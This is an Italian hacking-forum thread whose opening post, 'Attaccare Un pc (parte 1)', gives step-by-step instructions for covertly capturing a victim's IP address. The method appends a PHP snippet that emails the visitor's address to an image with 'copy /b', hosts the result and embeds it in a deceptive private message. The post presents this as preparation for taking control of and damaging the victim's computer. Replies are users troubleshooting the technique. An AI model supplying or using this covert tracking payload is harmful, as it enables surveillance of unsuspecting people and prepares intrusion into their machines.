-
-Gamemaster-.
User deleted
Probabilmente questo articolo farà gola a molti...
Avete capito bene...attacchiamo un determinato PC per prenderne il controllo, spiarne i file, fare danni...
Provate tutto su VOSTRI PC se no non va bene...
Allora...questa prima parte della "guida" punterà a trovare l'IP della vostra "vittima" in modo efficace e discreto...e a farcelo addirittura spedire per email
Ovviamente se avete già l'IP della "vittima" o sapete come ottenerlo tramite altri modo potete saltare questa parte
la tecnica ke sfrutteremo è l'iniezione di codice php in una immagine...
Partiamo subito! Mi limito a illustrare i passaggi, rifletteteci bene sopra e capirete come funziona!
Requisiti:
1)Un PC con Windows (ma ddddai? ^^)
2)Un vostro server ke supporta php (consiglio altervista, www.altervista.org)
3)Qlke minuto di tempo e conoscenze basilari basilari del PC
Partiamo...
1)Scegliamo un'immagine...la nostra vittima dovrà vederla e concentrarsi su d quella...senza sospettare ke gli stiamo fregando l'IP, non so, una cosa divertente ke gli vogliamo far vedere o qlkosa di simile...
2)Mettiamola in una cartella...ke in qsta guida kiameremo "cart"
3)Inseriamo in blocco note queste righe cambiandone la seconda:CODICE<?
$a="TUAMAIL@TUAMAIL.it";
$oggetto="ip";
$IP = $_SERVER[ 'REMOTE_ADDR' ];
$messaggio=$IP;
mail($a, $oggetto, $messaggio);
?>
e lo salviamo come "ipt.php" (virgolette INCLUSE) in "cart"
4)Andiamo su start > esegui > "cmd" > Invio
5)Attraverso il comando "cd" ci spostiamo nella cartella "cart"
6)A questo punto diamo il comandoCODICEcopy /b VOSTRA_IMMAGINE.JPG/GIF/PNG+ipt.php ip.php
(Con questo comando sommiamo i codici binari del file della vostra immagine e del file precedentemente creato con blocco note)
7)Uppiamo il nuovo file creatosi nella cartella "cart" (ip.php) nel nostro server
8)A questo punto non ci resta che trovare il modo di far vedere la nostra immagine alla vittima attraverso internet (trovo utilissimo per esempio mandargli un Messaggio Privato dei vari forum...)
Per far ciò scriviamo un messaggio ke nn lo induca a pensare ke gli stiamo fregando l'IP e aggiungere questo codice:CODICE<img src=http://VOSTROSITO.IT/ip.php>
cambiando ovviamente il valore di src con la posizione del file precedentemente uppato
9)Inviamogli il messaggio e appena lo leggere il suo IP vi verrà mandato via mail! Controllate la posta molto frequentemente xke quell'IP lo dovrete usare subito...PRIMA KE SI DISCONNETTE DA INTERNET!
Ma vediamo cosa è successo...
La vittima ha letto il vostro messaggio...il nostro server ha ricavato l'ip ke ha effettuato la rikiesta della pagina ip.php e ce l'ha mandato via mail. Successivamente gli ha mandato l'intero file. Il browser della vittima va alla ricerca dell'immagine contenuta nel file (proprio xke col codice di sopra abbiamo detto al browser ke si tratta di un'immagine) e la mostra nel messaggio ricevuto dalla vittima. Quest'ultima non sospetta d nnt a magari vi risponderà pure al messaggio XD
Nella prossima parte della guida vedremo come sfruttare l'IP per attaccare la nostra "vittima"...
stay tuned!
Edited by MS-DOS - 20/12/2009, 02:28. -
megas93.
User deleted
.............. mi e familiare............ . -
black224.
User deleted
ma le virgolette del file php non dovrebbero essere ESCLUSE? . -
MS-DOS.
User deleted
CITAZIONE (black224 @ 4/9/2009, 14:47)ma le virgolette del file php non dovrebbero essere ESCLUSE?
Si infatti. Modifico.
. -
cats91.
User deleted
problema 
quando clicco sul file ip.php non mi apre l'immagine e mi da il seguente errore:
Parse error: syntax error, unexpected T_STRING in /membri/knos/ip.php on line 115
Se invece apro il file ipt.php mi invia l'ip all'indirizzo.
Quindi penso che il problema sia nella "somma" dei codici @_@
io digito come segue:
C:Document and Settingsuser>cd C:cart
C:cart>copy /b a.jpg+ipt.php ip.php
e mi dice
1 file copiati.
Giusti i passaggi?
. -
black224.
User deleted
CITAZIONE (cats91 @ 26/1/2010, 16:43)problema
quando clicco sul file ip.php non mi apre l'immagine e mi da il seguente errore:
Parse error: syntax error, unexpected T_STRING in /membri/knos/ip.php on line 115
Se invece apro il file ipt.php mi invia l'ip all'indirizzo.
Quindi penso che il problema sia nella "somma" dei codici @_@
io digito come segue:
C:Document and Settingsuser>cd C:cart
C:cart>copy /b a.jpg+ipt.php ip.php
e mi dice
1 file copiati.
Giusti i passaggi?
se non sbaglio dovrebbe essere C:cart
aaa non scrive lo slash..XD comunque va tra i : e cart. -
cats91.
User deleted
CITAZIONE (black224 @ 26/1/2010, 16:55)CITAZIONE (cats91 @ 26/1/2010, 16:43)problema
quando clicco sul file ip.php non mi apre l'immagine e mi da il seguente errore:
Parse error: syntax error, unexpected T_STRING in /membri/knos/ip.php on line 115
Se invece apro il file ipt.php mi invia l'ip all'indirizzo.
Quindi penso che il problema sia nella "somma" dei codici @_@
io digito come segue:
C:Document and Settingsuser>cd C:cart
C:cart>copy /b a.jpg+ipt.php ip.php
e mi dice
1 file copiati.
Giusti i passaggi?
se non sbaglio dovrebbe essere C:cart
aaa non scrive lo slash..XD comunque va tra i : e cart
lo slash lo metto, l'ho messo anche nel messaggio di prima ma non me lo ha scritto nel post.
il percorso è scritto giusto, però rimane il problema che aprendo ip.php mi da l'errore e non si vede l'immagine e non invia nessuna mail. Se apro solo ipt.php invece invia la mail ma ovviamente nessuna immagine. :S
Help xD
. -
cats91.
User deleted
UP 
comunque qui ve l'hanno copiata senza fonte >.<
http://www.sciax2.it/forum/web-security-at...e-pc-57059.html. -
eros75.
User deleted
Scusate,mi spiegate come uppare il file su www.altervista.org????
poi non ho capito questo passaggio.....a cosa serve uppare questo file???quando lo uppo si trasforma in un file jpg??
help me pleaseeeeeeeeeee
. -
cats91.
User deleted
CITAZIONE (eros75 @ 9/2/2010, 03:10)Scusate,mi spiegate come uppare il file su www.altervista.org????
poi non ho capito questo passaggio.....a cosa serve uppare questo file???quando lo uppo si trasforma in un file jpg??
help me pleaseeeeeeeeeee
Per uppare il file su Altervista devi registrarti e crearti un sito (tutti quelli con dominio http://nomesito.altervista.org) dove puoi caricare i file.
Uppare il file serve per "inviarlo" alla vittima, altrimenti come faresti a far aprire quel file alla vittima?
Tu uppi il file, dai il collegamento alla vittima, lei la apre e teoricamente lei vede l'immagine e sulla mail che hai impostato ti arriva l'indirizzo IP. Ho messo teoricamente perchè a me non funziona >.< ho risolto uppando il file ipt.php e dicendo di cliccare su quello per verificare se il fantomatico sito che avevo creato era supportato dal pc della vittima XD. -
lucatesencula.
User deleted
ragazzi io mi sono fermato al 4 passagio quando apriamo il cmd ma cosa devo scriverci io metto il comando cd ma nn mi fa nulla provo a metterci la directory della cartella e nulla ma che devo fare?? grazie fatemi sapere CITAZIONE (lucatesencula @ 23/2/2010, 21:46)ragazzi io mi sono fermato al 4 passagio quando apriamo il cmd ma cosa devo scriverci io metto il comando cd ma nn mi fa nulla provo a metterci la directory della cartella e nulla ma che devo fare?? grazie fatemi sapere
ho risolto ragazzi se ho problemi vi scrivo
. -
Dark-King §GMG§.
User deleted
ragazzi anche a me da il problema di carts91... Cosa dobbiamo fare ? . -
simozappobeach.
User deleted
ehi ma come faccioa a:7)Uppiamo il nuovo file creatosi nella cartella "cart" (ip.php) nel nostro server????help me!!!
. -
doctropaz.
User deleted
anche io ho lo stesso problema di cats91 chi ci sa aiutare???????? Grazie . -
Nascoor™.
User deleted
OMG tutte queste domande senza una Risposta concreda haahhaaha si vede che sono bravi !!! .
Attaccare Un pc (parte 1) |